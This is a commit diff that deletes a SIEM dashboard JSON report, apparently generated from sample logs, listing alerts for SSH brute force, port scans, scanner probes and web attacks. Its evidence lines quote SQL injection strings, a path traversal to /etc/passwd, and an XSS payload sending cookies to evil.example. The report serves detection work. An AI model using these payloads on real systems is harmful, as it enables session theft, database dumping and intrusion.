Delete dashboard/siem_report.json
هذا الالتزام موجود في:
@@ -1,347 +0,0 @@
|
||||
{
|
||||
"generated_at": "2026-07-29T00:57:48.516747Z",
|
||||
"meta": {
|
||||
"endpoints": [
|
||||
"web-server (endpoint-1)",
|
||||
"firewall (endpoint-2)",
|
||||
"ssh-auth (endpoint-3)"
|
||||
],
|
||||
"lines_parsed": {
|
||||
"web-server (endpoint-1)": 45,
|
||||
"firewall (endpoint-2)": 34,
|
||||
"ssh-auth (endpoint-3)": 27
|
||||
}
|
||||
},
|
||||
"stats": {
|
||||
"total_alerts": 17,
|
||||
"by_severity": {
|
||||
"critical": 9,
|
||||
"high": 5,
|
||||
"medium": 3,
|
||||
"low": 0
|
||||
},
|
||||
"unique_malicious_ips": 4,
|
||||
"total_events_parsed": 106
|
||||
},
|
||||
"alerts": [
|
||||
{
|
||||
"id": "ALT-0012",
|
||||
"timestamp": "2026-07-27T10:07:41",
|
||||
"endpoint": "ssh-auth (endpoint-3)",
|
||||
"src_ip": "198.51.100.234",
|
||||
"alert_type": "BRUTE_FORCE_SSH",
|
||||
"severity": "high",
|
||||
"description": "12 failed SSH login attempts within 300s trying 9 usernames (admin, administrator, backup, guest, oracle, postgres)",
|
||||
"evidence": [
|
||||
"Jul 27 10:07:41 app-srv-05 sshd[10201]: Failed password for invalid user admin from 198.51.100.234 port 39001 ssh2",
|
||||
"Jul 27 10:07:43 app-srv-05 sshd[10202]: Failed password for invalid user admin from 198.51.100.234 port 39002 ssh2",
|
||||
"Jul 27 10:07:45 app-srv-05 sshd[10203]: Failed password for invalid user administrator from 198.51.100.234 port 39003 ssh2",
|
||||
"Jul 27 10:07:47 app-srv-05 sshd[10204]: Failed password for invalid user user from 198.51.100.234 port 39004 ssh2",
|
||||
"Jul 27 10:07:49 app-srv-05 sshd[10205]: Failed password for invalid user guest from 198.51.100.234 port 39005 ssh2"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0006",
|
||||
"timestamp": "2026-07-27T10:06:11",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "SQL_INJECTION",
|
||||
"severity": "critical",
|
||||
"description": "Sql Injection attempt detected in request to /api/users?id=1'%20OR%20'1'='1",
|
||||
"evidence": [
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:11 +0000] \"GET /api/users?id=1'%20OR%20'1'='1 HTTP/1.1\" 500 640 \"-\" \"python-requests/2.31\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0009",
|
||||
"timestamp": "2026-07-27T10:06:00",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "HIGH_REQUEST_RATE",
|
||||
"severity": "medium",
|
||||
"description": "21 requests from a single IP within 60s (possible scraping/DoS/automation)",
|
||||
"evidence": [
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:00 +0000] \"GET /api/data?page=1 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\"",
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:01 +0000] \"GET /api/data?page=2 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\"",
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:01 +0000] \"GET /api/data?page=3 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\"",
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:02 +0000] \"GET /api/data?page=4 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\"",
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:02 +0000] \"GET /api/data?page=5 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0016",
|
||||
"timestamp": "2026-07-27T10:06:00",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "BLACKLISTED_IP_ACTIVITY",
|
||||
"severity": "critical",
|
||||
"description": "Traffic from known-malicious IP 192.0.2.77: Listed in external threat-intel feed (example seed entry)",
|
||||
"evidence": [
|
||||
"192.0.2.77 - - [27/Jul/2026:10:06:00 +0000] \"GET /api/data?page=1 HTTP/1.1\" 200 1200 \"-\" \"python-requests/2.31\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0013",
|
||||
"timestamp": "2026-07-27T10:05:24",
|
||||
"endpoint": "ssh-auth (endpoint-3)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "ACCOUNT_COMPROMISE_SUSPECTED",
|
||||
"severity": "critical",
|
||||
"description": "Successful SSH login as 'root' immediately following a brute-force burst from the same IP -- account may be compromised",
|
||||
"evidence": [
|
||||
"Jul 27 10:05:24 app-srv-05 sshd[10111]: Accepted password for root from 192.0.2.77 port 41011 ssh2"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0011",
|
||||
"timestamp": "2026-07-27T10:05:12",
|
||||
"endpoint": "ssh-auth (endpoint-3)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "BRUTE_FORCE_SSH",
|
||||
"severity": "high",
|
||||
"description": "10 failed SSH login attempts within 300s trying 7 usernames (admin, deploy, oracle, postgres, root, test)",
|
||||
"evidence": [
|
||||
"Jul 27 10:05:12 app-srv-05 sshd[10101]: Failed password for invalid user admin from 192.0.2.77 port 41001 ssh2",
|
||||
"Jul 27 10:05:13 app-srv-05 sshd[10102]: Failed password for invalid user root from 192.0.2.77 port 41002 ssh2",
|
||||
"Jul 27 10:05:14 app-srv-05 sshd[10103]: Failed password for invalid user test from 192.0.2.77 port 41003 ssh2",
|
||||
"Jul 27 10:05:15 app-srv-05 sshd[10104]: Failed password for invalid user oracle from 192.0.2.77 port 41004 ssh2",
|
||||
"Jul 27 10:05:16 app-srv-05 sshd[10105]: Failed password for invalid user ubuntu from 192.0.2.77 port 41005 ssh2"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0015",
|
||||
"timestamp": "2026-07-27T10:05:12",
|
||||
"endpoint": "ssh-auth (endpoint-3)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "BLACKLISTED_IP_ACTIVITY",
|
||||
"severity": "critical",
|
||||
"description": "Traffic from known-malicious IP 192.0.2.77: Listed in external threat-intel feed (example seed entry)",
|
||||
"evidence": [
|
||||
"Jul 27 10:05:12 app-srv-05 sshd[10101]: Failed password for invalid user admin from 192.0.2.77 port 41001 ssh2"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0010",
|
||||
"timestamp": "2026-07-27T10:05:01",
|
||||
"endpoint": "firewall (endpoint-2)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "PORT_SCAN",
|
||||
"severity": "high",
|
||||
"description": "Port scan detected: 20 distinct destination ports probed against 10.0.0.5 within 120s (17 denied, 3 allowed)",
|
||||
"evidence": [
|
||||
"2026-07-27 10:05:01 SRC=192.0.2.77 SPT=33001 DST=10.0.0.5 DPT=20 PROTO=TCP ACTION=DENY",
|
||||
"2026-07-27 10:05:01 SRC=192.0.2.77 SPT=33002 DST=10.0.0.5 DPT=21 PROTO=TCP ACTION=DENY",
|
||||
"2026-07-27 10:05:02 SRC=192.0.2.77 SPT=33003 DST=10.0.0.5 DPT=22 PROTO=TCP ACTION=ALLOW",
|
||||
"2026-07-27 10:05:02 SRC=192.0.2.77 SPT=33004 DST=10.0.0.5 DPT=23 PROTO=TCP ACTION=DENY",
|
||||
"2026-07-27 10:05:03 SRC=192.0.2.77 SPT=33005 DST=10.0.0.5 DPT=25 PROTO=TCP ACTION=DENY"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0014",
|
||||
"timestamp": "2026-07-27T10:05:01",
|
||||
"endpoint": "firewall (endpoint-2)",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "BLACKLISTED_IP_ACTIVITY",
|
||||
"severity": "critical",
|
||||
"description": "Traffic from known-malicious IP 192.0.2.77: Listed in external threat-intel feed (example seed entry)",
|
||||
"evidence": [
|
||||
"2026-07-27 10:05:01 SRC=192.0.2.77 SPT=33001 DST=10.0.0.5 DPT=20 PROTO=TCP ACTION=DENY"
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0017",
|
||||
"timestamp": "2026-07-27T10:05:01",
|
||||
"endpoint": "correlation-engine",
|
||||
"src_ip": "192.0.2.77",
|
||||
"alert_type": "MULTI_VECTOR_ATTACK",
|
||||
"severity": "critical",
|
||||
"description": "IP 192.0.2.77 triggered alerts across 3 different endpoints (firewall (endpoint-2), ssh-auth (endpoint-3), web-server (endpoint-1)) -- consistent with a coordinated, multi-stage attack (recon -> exploitation -> access)",
|
||||
"evidence": []
|
||||
},
|
||||
{
|
||||
"id": "ALT-0008",
|
||||
"timestamp": "2026-07-27T10:03:01",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.99",
|
||||
"alert_type": "RECON_SCANNER",
|
||||
"severity": "medium",
|
||||
"description": "Automated vulnerability scan detected (nikto): 7 probe requests against paths such as /admin, /admin.php, /phpmyadmin/",
|
||||
"evidence": [
|
||||
"203.0.113.99 - - [27/Jul/2026:10:03:01 +0000] \"GET /admin HTTP/1.1\" 404 190 \"-\" \"Mozilla/5.0 (compatible; Nikto/2.5.0)\"",
|
||||
"203.0.113.99 - - [27/Jul/2026:10:03:02 +0000] \"GET /admin.php HTTP/1.1\" 404 190 \"-\" \"Mozilla/5.0 (compatible; Nikto/2.5.0)\"",
|
||||
"203.0.113.99 - - [27/Jul/2026:10:03:03 +0000] \"GET /phpmyadmin/ HTTP/1.1\" 404 190 \"-\" \"Mozilla/5.0 (compatible; Nikto/2.5.0)\"",
|
||||
"203.0.113.99 - - [27/Jul/2026:10:03:04 +0000] \"GET /.env HTTP/1.1\" 404 190 \"-\" \"Mozilla/5.0 (compatible; Nikto/2.5.0)\"",
|
||||
"203.0.113.99 - - [27/Jul/2026:10:03:05 +0000] \"GET /wp-login.php HTTP/1.1\" 404 190 \"-\" \"Mozilla/5.0 (compatible; Nikto/2.5.0)\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0005",
|
||||
"timestamp": "2026-07-27T10:01:12",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "PATH_TRAVERSAL",
|
||||
"severity": "high",
|
||||
"description": "Path Traversal attempt detected in request to /download?file=../../../../etc/passwd",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:12 +0000] \"GET /download?file=../../../../etc/passwd HTTP/1.1\" 403 210 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0004",
|
||||
"timestamp": "2026-07-27T10:01:09",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "XSS",
|
||||
"severity": "high",
|
||||
"description": "Xss attempt detected in request to /search?q=<script>document.location='http://evil.example/c?'+document.cookie</script>",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:09 +0000] \"GET /search?q=<script>document.location='http://evil.example/c?'+document.cookie</script> HTTP/1.1\" 200 998 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0003",
|
||||
"timestamp": "2026-07-27T10:01:06",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "SQL_INJECTION",
|
||||
"severity": "critical",
|
||||
"description": "Sql Injection attempt detected in request to /products?id=1'%20AND%20SLEEP(5)--",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:06 +0000] \"GET /products?id=1'%20AND%20SLEEP(5)-- HTTP/1.1\" 500 812 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0002",
|
||||
"timestamp": "2026-07-27T10:01:04",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "SQL_INJECTION",
|
||||
"severity": "critical",
|
||||
"description": "Sql Injection attempt detected in request to /products?id=1%20UNION%20SELECT%20username,password%20FROM%20users--",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:04 +0000] \"GET /products?id=1%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1\" 500 812 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0001",
|
||||
"timestamp": "2026-07-27T10:01:02",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "SQL_INJECTION",
|
||||
"severity": "critical",
|
||||
"description": "Sql Injection attempt detected in request to /login.php?user=admin'%20OR%20'1'='1'--",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:02 +0000] \"GET /login.php?user=admin'%20OR%20'1'='1'-- HTTP/1.1\" 401 512 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
},
|
||||
{
|
||||
"id": "ALT-0007",
|
||||
"timestamp": "2026-07-27T10:01:02",
|
||||
"endpoint": "web-server (endpoint-1)",
|
||||
"src_ip": "203.0.113.66",
|
||||
"alert_type": "RECON_SCANNER",
|
||||
"severity": "medium",
|
||||
"description": "Automated vulnerability scan detected (sqlmap): 5 probe requests against paths such as /login.php?user=admin'%20OR%20'1'='1'--, /products?id=1%20UNION%20SELECT%20username,password%20FROM%20users--, /products?id=1'%20AND%20SLEEP(5)--",
|
||||
"evidence": [
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:02 +0000] \"GET /login.php?user=admin'%20OR%20'1'='1'-- HTTP/1.1\" 401 512 \"-\" \"sqlmap/1.7.2#stable\"",
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:04 +0000] \"GET /products?id=1%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1\" 500 812 \"-\" \"sqlmap/1.7.2#stable\"",
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:06 +0000] \"GET /products?id=1'%20AND%20SLEEP(5)-- HTTP/1.1\" 500 812 \"-\" \"sqlmap/1.7.2#stable\"",
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:09 +0000] \"GET /search?q=<script>document.location='http://evil.example/c?'+document.cookie</script> HTTP/1.1\" 200 998 \"-\" \"sqlmap/1.7.2#stable\"",
|
||||
"203.0.113.66 - - [27/Jul/2026:10:01:12 +0000] \"GET /download?file=../../../../etc/passwd HTTP/1.1\" 403 210 \"-\" \"sqlmap/1.7.2#stable\""
|
||||
]
|
||||
}
|
||||
],
|
||||
"malicious_ips": [
|
||||
{
|
||||
"ip": "192.0.2.77",
|
||||
"threat_score": 72,
|
||||
"severity_counts": {
|
||||
"critical": 6,
|
||||
"high": 2,
|
||||
"medium": 1,
|
||||
"low": 0
|
||||
},
|
||||
"total_alerts": 9,
|
||||
"alert_types": [
|
||||
"ACCOUNT_COMPROMISE_SUSPECTED",
|
||||
"BLACKLISTED_IP_ACTIVITY",
|
||||
"BRUTE_FORCE_SSH",
|
||||
"HIGH_REQUEST_RATE",
|
||||
"MULTI_VECTOR_ATTACK",
|
||||
"PORT_SCAN",
|
||||
"SQL_INJECTION"
|
||||
],
|
||||
"endpoints_involved": [
|
||||
"firewall (endpoint-2)",
|
||||
"ssh-auth (endpoint-3)",
|
||||
"web-server (endpoint-1)"
|
||||
],
|
||||
"first_seen": "2026-07-27T10:05:01",
|
||||
"last_seen": "2026-07-27T10:06:11",
|
||||
"known_threat_intel": "Listed in external threat-intel feed (example seed entry)"
|
||||
},
|
||||
{
|
||||
"ip": "203.0.113.66",
|
||||
"threat_score": 42,
|
||||
"severity_counts": {
|
||||
"critical": 3,
|
||||
"high": 2,
|
||||
"medium": 1,
|
||||
"low": 0
|
||||
},
|
||||
"total_alerts": 6,
|
||||
"alert_types": [
|
||||
"PATH_TRAVERSAL",
|
||||
"RECON_SCANNER",
|
||||
"SQL_INJECTION",
|
||||
"XSS"
|
||||
],
|
||||
"endpoints_involved": [
|
||||
"web-server (endpoint-1)"
|
||||
],
|
||||
"first_seen": "2026-07-27T10:01:02",
|
||||
"last_seen": "2026-07-27T10:01:12",
|
||||
"known_threat_intel": null
|
||||
},
|
||||
{
|
||||
"ip": "198.51.100.234",
|
||||
"threat_score": 5,
|
||||
"severity_counts": {
|
||||
"critical": 0,
|
||||
"high": 1,
|
||||
"medium": 0,
|
||||
"low": 0
|
||||
},
|
||||
"total_alerts": 1,
|
||||
"alert_types": [
|
||||
"BRUTE_FORCE_SSH"
|
||||
],
|
||||
"endpoints_involved": [
|
||||
"ssh-auth (endpoint-3)"
|
||||
],
|
||||
"first_seen": "2026-07-27T10:07:41",
|
||||
"last_seen": "2026-07-27T10:07:41",
|
||||
"known_threat_intel": null
|
||||
},
|
||||
{
|
||||
"ip": "203.0.113.99",
|
||||
"threat_score": 2,
|
||||
"severity_counts": {
|
||||
"critical": 0,
|
||||
"high": 0,
|
||||
"medium": 1,
|
||||
"low": 0
|
||||
},
|
||||
"total_alerts": 1,
|
||||
"alert_types": [
|
||||
"RECON_SCANNER"
|
||||
],
|
||||
"endpoints_involved": [
|
||||
"web-server (endpoint-1)"
|
||||
],
|
||||
"first_seen": "2026-07-27T10:03:01",
|
||||
"last_seen": "2026-07-27T10:03:01",
|
||||
"known_threat_intel": null
|
||||
}
|
||||
]
|
||||
}
|
||||
المرجع في مشكلة جديدة
حظر مستخدم